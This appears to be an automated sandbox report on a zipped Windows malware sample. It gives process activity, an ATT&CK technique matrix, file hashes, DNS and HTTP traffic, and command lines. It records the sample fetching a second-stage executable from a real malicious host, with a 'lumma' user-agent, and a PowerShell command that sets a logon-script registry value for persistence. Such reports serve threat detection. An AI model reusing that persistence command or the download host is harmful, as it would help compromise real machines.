Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://smartlifeshift.com/d100%Avira URL Cloudphishing
http://smartlifeshift.com/100%Avira URL Cloudphishing
http://smartlifeshift.com/share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exe100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
smartlifeshift.com
83.217.208.151
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://smartlifeshift.com/share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exefalse
    • Avira URL Cloud: phishing
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://smartlifeshift.com/jPvnTotc.exe, 00000009.00000002.1418406834.00000000007F6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: phishing
    unknown
    http://smartlifeshift.com/djPvnTotc.exe, 00000009.00000002.1418406834.00000000007F6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: phishing
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    83.217.208.151
    smartlifeshift.comRussian Federation
    31514INF-NET-ASRUfalse
    Joe Sandbox version:42.0.0 Malachite
    Analysis ID:1660018
    Start date and time:2025-04-08 22:07:27 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 50s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsinteractivecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip
    Detection:MAL
    Classification:mal64.winZIP@6/5@1/1
    Cookbook Comments:
    • Found application associated with file extension: .zip
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 184.31.69.3
    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    TimeTypeDescription
    16:08:31API Interceptor1x Sleep call for process: jPvnTotc.exe modified
    16:08:32API Interceptor3x Sleep call for process: powershell.exe modified
    No context
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    INF-NET-ASRUjPKFh06jHI.exeGet hashmaliciousVidarBrowse
    • 83.217.208.144
    http://www.delawarejellystone.comGet hashmaliciousUnknownBrowse
    • 89.169.52.197
    m4n1AQRhaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
    • 83.217.209.253
    Software Installer.exeGet hashmaliciousUnknownBrowse
    • 83.217.208.69
    http://89.169.13.138/3.exeGet hashmaliciousUnknownBrowse
    • 89.169.13.138
    tlses(x86).exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
    • 83.217.208.90
    vstdlib_s64.dll.dllGet hashmaliciousRHADAMANTHYSBrowse
    • 83.217.208.36
    Limba#U017ei.dll.dllGet hashmaliciousRHADAMANTHYSBrowse
    • 83.217.208.96
    albion.ps1Get hashmaliciousUnknownBrowse
    • 83.217.208.90
    https://report-dto51bfgo7f.pages.dev/Get hashmaliciousUnknownBrowse
    • 83.217.208.90
    No context
    No context
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):16048
    Entropy (8bit):5.576132873290023
    Encrypted:false
    SSDEEP:384:5vUWgptzB10tWozEJBM+XJC7GHetWkzDfvbJWQwiaVjJna:dwJwsy+XUwe9PJvfaNJna
    MD5:2493AF08636B0640F28BDFBCEFFD9462
    SHA1:9848C510CB3ED50C7405938DFA1BFD186E77DA65
    SHA-256:2F3F0C36C9A79ED0C43D086E10757EC58DE940D914F025D9F02244B8B2EF9439
    SHA-512:2B62C02E1838A24958472B9DE04D6BDA72B0427022604DEAB3DBF694FF83E83123430D3699689FBBFA08FA879026C82A575645BE5AF9F9BB28F6D1A47647DDAC
    Malicious:false
    Reputation:low
    Preview:@...e...........v...............5...*.n..............@..........H...............o..b~.D.poM...&..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V...../.......System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins
    Process:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):4.393180316942573
    Encrypted:false
    SSDEEP:24:Y5P1AHf3LJWwbx+WlkqV+6ElPZAtMz7TlORO:YHUf7Jpx5lklJlFlT
    MD5:4038CE3915D47D59D89C82C0404EA207
    SHA1:DCD7D332B3AC072F0BCA5EF0E4775622E57B4959
    SHA-256:E9B18BB9FF848EB002267D3E8EF572D00603882911C07727E1A923A6440E0A92
    SHA-512:556B5697F13AB870E8EBCDEC17AE79369999ADCAC8C99854BB6A90C150C16FCDF4AF43F7975E7F5A11CE26B242BDEB24EC7771BC472E98AC1782D777EDA27E3A
    Malicious:true
    Reputation:low
    Preview:......6..% ..Fh.......d......%...R..U..(|..k.2..>._#.mn..A.e8.w.t..WL........X.z.j)...jw...\.... .......3.2..u|......${.....p.|...{...................|.....$.{...|...|............. ........${.......{.........p.{...........|.`..t7..t`.....lw...+.........oiw........ .{.h.........{...iw...\..........iw..iw...u.....@.p...................................p.................................{..............^iw.....^iw....................,....[iw..|.................a\iw........L.ew..|...........ew................................C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.e.m.p.1._.M.D.E._.F.i.l.e._.S.a.m.p.l.e._.0.b.d..Qiw]..\..|...{.....b.a.4.b.2.4.6.2.....e.8.....6.1.a.8.1.6.....6.2.c.1.9...z.i.p.\.j.P.v.n.T.o.........x.e......Qiw.\..|...{..... ....... .....{.................D..D..|. .. ........ ............... ...D...<...........................D.....{.......|.>.....{.........D..D .........|.........p.{.................>...D.....{......u|..............{mwD...p.|.
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:high, very likely benign file
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:high, very likely benign file
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    Process:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe
    File Type:HTML document, ASCII text
    Category:dropped
    Size (bytes):265
    Entropy (8bit):4.405701580091804
    Encrypted:false
    SSDEEP:6:qTIuJzh5j4LADWcBDWANh1L203OTxBVWR7qa0XsC9GWn:qTpB4UDW4DW8hslhWRWXEW
    MD5:241BF861EBAA218906A423003095827C
    SHA1:9FDD4024D45CBF6FE44FE2C1AB13096BC6D422D8
    SHA-256:AE5163256B944013E27CBEF0D2BCD33A6DACBB92463509F91D5F3DF782142910
    SHA-512:CE4F61D64F14AB05B08E99A7F917D462077069C509E627126701B710FC8B1D2961BE4692C5944E522B7CFDF5260176EDA6A0A8D996FD57F1E81F4C0A8052E9A5
    Malicious:true
    Reputation:low
    Preview:<!doctype html>.<html lang=en>.<title>500 Internal Server Error</title>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>.
    File type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Entropy (8bit):7.997283238487985
    TrID:
    • ZIP compressed archive (8000/1) 100.00%
    File name:MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip
    File size:69'253 bytes
    MD5:4a85967edac8e7034a44702ffa2b9754
    SHA1:1f4e868de790e4be51f375f27345ec0056860da1
    SHA256:07318a66ab562d9f8ab9ae9c914644d5bb25fb11f72f705c8800d2bc4e0e0a65
    SHA512:f36f00fc616b35d03024a9d12fc4411e5edf00ec40f9ca752453a7245b99ebc532210649f049814f1704a28ace5f88d70f8133c163e8bbae6f09674b62b7e320
    SSDEEP:1536:81g2hnJ+RKQVDUTY9w4iWD6yIhlW7036rIQpblnmwuwZx:72dAI0Db9w4iSyhlRQScZx
    TLSH:95630234A8DE03169EC2A92FF3E4A45DAFD5C475BBE9191D12704FBA4295A083CD13B8
    File Content Preview:PK.........t.Z@3............$.jPvnTotc.exe.. .........>.:.....=.:.....6.:.......8.C$..-. .....\...Xjm...........bp.:....#[n+..o`.=M..Z..:Vl....dP..2..q..~..$|Nh.f...|.)..V.>.1.X.r..FO^)..P.r...!....$.?.].#d......'......\...s..@....v..~..9C..X.G.C..:...H..
    Icon Hash:1c1c1e4e4ececedc
    TimestampSource PortDest PortSource IPDest IP
    Apr 8, 2025 22:08:32.253551960 CEST4970380192.168.2.1683.217.208.151
    Apr 8, 2025 22:08:32.442677975 CEST804970383.217.208.151192.168.2.16
    Apr 8, 2025 22:08:32.442775011 CEST4970380192.168.2.1683.217.208.151
    Apr 8, 2025 22:08:32.443001032 CEST4970380192.168.2.1683.217.208.151
    Apr 8, 2025 22:08:32.630289078 CEST804970383.217.208.151192.168.2.16
    Apr 8, 2025 22:08:32.685040951 CEST804970383.217.208.151192.168.2.16
    Apr 8, 2025 22:08:32.685069084 CEST804970383.217.208.151192.168.2.16
    Apr 8, 2025 22:08:32.685143948 CEST4970380192.168.2.1683.217.208.151
    Apr 8, 2025 22:08:32.685235023 CEST4970380192.168.2.1683.217.208.151
    Apr 8, 2025 22:08:32.873158932 CEST804970383.217.208.151192.168.2.16
    TimestampSource PortDest PortSource IPDest IP
    Apr 8, 2025 22:08:31.970952988 CEST6552553192.168.2.161.1.1.1
    Apr 8, 2025 22:08:32.247781038 CEST53655251.1.1.1192.168.2.16
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Apr 8, 2025 22:08:31.970952988 CEST192.168.2.161.1.1.10xc1bStandard query (0)smartlifeshift.comA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 8, 2025 22:08:32.247781038 CEST1.1.1.1192.168.2.160xc1bNo error (0)smartlifeshift.com83.217.208.151A (IP address)IN (0x0001)false
    • smartlifeshift.com
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.164970383.217.208.151803980C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe
    TimestampBytes transferredDirectionData
    Apr 8, 2025 22:08:32.443001032 CEST204OUTGET /share/466cc0b75fa453dbf9b068341cea5e77f8543c626b7a905af578a415ae7791d0.exe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: lumma
    Host: smartlifeshift.com
    Apr 8, 2025 22:08:32.685040951 CEST452INHTTP/1.1 500 INTERNAL SERVER ERROR
    Date: Tue, 08 Apr 2025 20:08:32 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 265
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 45 69 74 68 65 72 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 6f 76 65 72 6c 6f 61 64 65 64 20 6f 72 20 74 68 65 72 65 20 69 73 20 61 6e 20 65 72 72 6f 72 20 69 6e 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 3c 2f 70 3e 0a
    Data Ascii: <!doctype html><html lang=en><title>500 Internal Server Error</title><h1>Internal Server Error</h1><p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:16:08:04
    Start date:08/04/2025
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    Imagebase:0x7ff6c6400000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:16:08:30
    Start date:08/04/2025
    Path:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_0bd717cd72246ba4b246245e85161a8162d62c19.zip\jPvnTotc.exe"
    Imagebase:0x400000
    File size:132'096 bytes
    MD5 hash:5E65DBAF6A158B83F280B529368AB428
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:10
    Start time:16:08:31
    Start date:08/04/2025
    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):true
    Commandline:powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\user\AppData\Roaming\Microsoft\Protect\a2015df1dr.exe'"
    Imagebase:0x220000
    File size:433'152 bytes
    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:11
    Start time:16:08:31
    Start date:08/04/2025
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6aa7d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly